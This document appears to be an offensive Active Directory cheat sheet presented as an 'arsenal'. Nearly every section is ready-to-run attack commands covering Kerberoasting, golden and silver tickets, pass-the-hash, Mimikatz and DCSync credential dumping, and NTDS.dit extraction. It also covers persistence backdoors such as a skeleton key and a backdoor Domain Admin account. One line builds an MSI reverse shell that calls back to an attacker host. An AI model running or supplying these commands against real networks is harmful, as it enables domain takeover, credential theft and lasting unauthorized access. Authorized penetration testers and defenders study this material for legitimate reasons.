⚔️ Active Directory Arsenal ⚔️

"Mastering the domain of Windows networks"

🏰 Active Directory Overview

Core Components

Component Description
Domain Controller Hosts AD database, handles authentication
NTDS.dit Database with all AD objects & password hashes
Kerberos Primary authentication protocol
LDAP Directory access protocol (port 389/636)

Attack Path Overview

Typical Compromise Chain

1. Initial Access (phishing, default creds)
2. Enumeration (users, groups, SPNs)
3. Credential Access (Kerberoasting, LLMNR)
4. Lateral Movement (PsExec, WinRM, RDP)
5. Privilege Escalation (token impersonation)
6. Domain Dominance (DCSync, Golden Ticket)

High-Value Groups

  • Domain Admins - Full domain control
  • Enterprise Admins - Full forest control
  • Backup Operators - Can backup/restore files
  • Account Operators - Can modify user accounts
  • DnsAdmins - Can load DLLs on DC (privesc)

🔍 Enumeration

PowerView - Domain Enumeration

PS> Get-Domain
PS> Get-DomainController
PS> Get-DomainUser | select samaccountname
PS> Get-DomainUser -SPN
PS> Get-DomainGroup "Domain Admins" | Get-DomainGroupMember
PS> Get-DomainComputer | select dnshostname
PS> Get-DomainGPO
PS> Find-DomainShare -CheckShareAccess

BloodHound Collection

BloodHound visualizes attack paths and relationships in AD
PS> Import-Module SharpHound.ps1
PS> Invoke-BloodHound -CollectionMethod All
$ bloodhound-python -d domain.local -u user -p pass -c all -ns 10.10.10.10
$ ./SharpHound.exe -c All

LDAP Enumeration

$ ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=local"
$ ldapdomaindump -u 'domain\user' -p password 10.10.10.10

SMB Enumeration

$ enum4linux -a 10.10.10.10
$ crackmapexec smb 10.10.10.0/24
$ crackmapexec smb 10.10.10.10 -u user -p pass --shares
$ smbclient -L //10.10.10.10 -U username

Native Windows Commands

C:\> net user /domain
C:\> net group "Domain Admins" /domain
C:\> net accounts /domain
C:\> nltest /domain_trusts

🎫 Kerberos Attacks

Kerberoasting

Request service tickets for SPN accounts, crack offline
PS> Get-DomainUser -SPN
PS> Invoke-Kerberoast -OutputFormat Hashcat
PS> Rubeus.exe kerberoast /outfile:hashes.txt
$ GetUserSPNs.py domain.local/user:pass -dc-ip 10.10.10.10 -request
$ hashcat -m 13100 hashes.txt wordlist.txt

AS-REP Roasting

Attack users with "Do not require Kerberos preauthentication"
PS> Get-DomainUser -PreauthNotRequired
PS> Rubeus.exe asreproast /format:hashcat
$ GetNPUsers.py domain.local/ -usersfile users.txt
$ hashcat -m 18200 hashes.txt wordlist.txt

Golden Ticket

Requires krbtgt hash - provides persistent DA access
PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /ptt"'

Silver Ticket

PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:HASH /ptt"'

Pass-the-Ticket

PS> Rubeus.exe ptt /ticket:ticket.kirbi
$ export KRB5CCNAME=ticket.ccache

Overpass-the-Hash

PS> Rubeus.exe asktgt /user:admin /rc4:HASH /ptt
PS> Invoke-Mimikatz -Command '"sekurlsa::pth /user:admin /domain:domain.local /ntlm:HASH"'

Unconstrained Delegation

PS> Get-DomainComputer -Unconstrained
PS> Rubeus.exe monitor /interval:5

🔄 Lateral Movement

Pass-the-Hash

$ crackmapexec smb 10.10.10.10 -u admin -H HASH
$ evil-winrm -i 10.10.10.10 -u admin -H HASH
$ impacket-psexec -hashes :HASH admin@10.10.10.10
$ impacket-wmiexec -hashes :HASH admin@10.10.10.10

PsExec

$ impacket-psexec domain.local/user:pass@10.10.10.10
C:\> PsExec.exe \\10.10.10.10 -u domain\user -p pass cmd

WMI Execution

$ impacket-wmiexec domain.local/user:pass@10.10.10.10
PS> Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "cmd" -ComputerName 10.10.10.10

WinRM / PowerShell Remoting

$ evil-winrm -i 10.10.10.10 -u user -p pass
PS> Enter-PSSession -ComputerName server01
PS> Invoke-Command -ComputerName server01 -ScriptBlock {whoami}

RDP

$ xfreerdp /u:admin /p:pass /v:10.10.10.10
$ xfreerdp /u:admin /pth:HASH /v:10.10.10.10

CrackMapExec Spray

$ crackmapexec smb 10.10.10.0/24 -u user -p pass
$ crackmapexec smb 10.10.10.0/24 -u user -H HASH --local-auth
$ crackmapexec smb 10.10.10.0/24 -u user -p pass -x "whoami"

🔒 Persistence

Golden Ticket Persistence

PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
PS> Invoke-Mimikatz -Command '"kerberos::golden /user:Admin /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /ptt"'

Skeleton Key

Patches LSASS on DC - requires reboot to remove
PS> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.local

AdminSDHolder Abuse

PS> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity backdoor -Rights All

Malicious GPO

PS> New-GPO -Name "Backdoor" | New-GPLink -Target "DC=domain,DC=local"

ACL Backdoors

PS> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity backdoor -Rights All
PS> Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity backdoor -Rights DCSync

Backdoor User

C:\> net user backdoor P@ssw0rd /add /domain
C:\> net group "Domain Admins" backdoor /add /domain

⬆️ Privilege Escalation

Automated Enumeration

PS> . .\PowerUp.ps1; Invoke-AllChecks
PS> .\winPEAS.exe
PS> .\Seatbelt.exe -group=all

Token Impersonation (SeImpersonate)

C:\> whoami /priv
C:\> .\PrintSpoofer.exe -i -c cmd
C:\> .\RoguePotato.exe -r 10.10.10.10 -e cmd

AlwaysInstallElevated

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi > shell.msi
C:\> msiexec /quiet /qn /i shell.msi

Unquoted Service Paths

C:\> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

GPP Passwords

PS> Get-GPPPassword
$ gpp-decrypt [encrypted_password]

SAM/SYSTEM Extraction

C:\> reg save HKLM\SAM SAM
C:\> reg save HKLM\SYSTEM SYSTEM
$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL

🔑 Password Attacks

Password Spraying

Try common passwords against all users - check lockout policy first!
$ crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!'
PS> Invoke-DomainPasswordSpray -UserList users.txt -Password Password123!
$ kerbrute passwordspray -d domain.local users.txt 'Password123!'

LLMNR/NBT-NS Poisoning

$ responder -I eth0 -wrf
$ hashcat -m 5600 hashes.txt wordlist.txt

SMB Relay

$ impacket-ntlmrelayx -tf targets.txt -smb2support
$ impacket-ntlmrelayx -t ldap://dc.domain.local --escalate-user lowpriv

Hash Cracking

$ hashcat -m 1000 ntlm_hashes.txt rockyou.txt
$ hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt
$ hashcat -m 13100 tgs_hashes.txt rockyou.txt
$ hashcat -m 18200 asrep_hashes.txt rockyou.txt

Mimikatz Credential Dumping

PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
PS> Invoke-Mimikatz -DumpCreds
C:\> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

DCSync Attack

PS> Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
$ secretsdump.py domain.local/admin@dc.domain.local -just-dc

NTDS.dit Extraction

C:\> ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q
$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
$ crackmapexec smb dc.domain.local -u admin -p pass --ntds

🛠️ Essential Tools

Enumeration Tools

  • PowerView - PowerShell AD enumeration (part of PowerSploit)
  • BloodHound - AD attack path visualization
  • SharpHound - BloodHound data collector
  • ADRecon - Comprehensive AD enumeration
  • ldapdomaindump - LDAP enumeration tool
  • enum4linux - Linux SMB enumeration

Exploitation Tools

  • Mimikatz - Credential dumping, ticket manipulation
  • Rubeus - Kerberos abuse toolkit
  • Impacket - Python SMB/MSRPC toolkit
  • CrackMapExec - Network enumeration and exploitation
  • Evil-WinRM - WinRM shell
  • Responder - LLMNR/NBT-NS poisoning

Privilege Escalation

  • PowerUp - Windows privilege escalation checker
  • winPEAS - Automated enumeration
  • Seatbelt - Security posture enumeration
  • PrintSpoofer - SeImpersonate exploitation
  • RoguePotato - Token impersonation

Essential Commands Quick Reference

Task Command
Find DCs nltest /dclist:domain.local
List users net user /domain
List Domain Admins net group "Domain Admins" /domain
Password policy net accounts /domain
Trust relationships nltest /domain_trusts
Current user whoami /all
Always start with BloodHound for comprehensive attack path analysis!